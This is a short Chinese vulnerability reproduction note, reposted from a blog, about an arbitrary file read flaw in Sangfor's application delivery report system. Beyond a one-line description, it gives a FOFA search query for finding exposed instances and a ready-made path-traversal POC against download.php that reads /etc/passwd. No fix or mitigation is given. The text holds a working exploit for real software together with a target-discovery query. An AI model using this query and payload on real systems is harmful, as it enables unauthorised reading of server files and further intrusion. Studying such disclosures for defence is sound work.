深信服应用交付报表任意文件读取漏洞
1.深信服应用交付报表任意文件读取漏洞
1.1.漏洞描述
深信服应用交付报表系统 download.php文件存在任意文件读取漏洞,攻击者通过漏洞可以下载服务器任意文件。
1.2.漏洞影响
深信服应用交付报表系统
1.3.FOFA
app=“SANGFOR-应用交付报表系统”
2.漏洞复现
2.1.登录页面
2.2.POC
这里通过抓包进行文件读取,当然也可以在页面中直接进行获取。
POC:/report/download.php?pdf=../../../../../etc/passwd
本文转载自: https://blog.csdn.net/weixin_44268918/article/details/128964755
版权归原作者 剁椒鱼头没剁椒 所有, 如有侵权,请联系我们删除。
版权归原作者 剁椒鱼头没剁椒 所有, 如有侵权,请联系我们删除。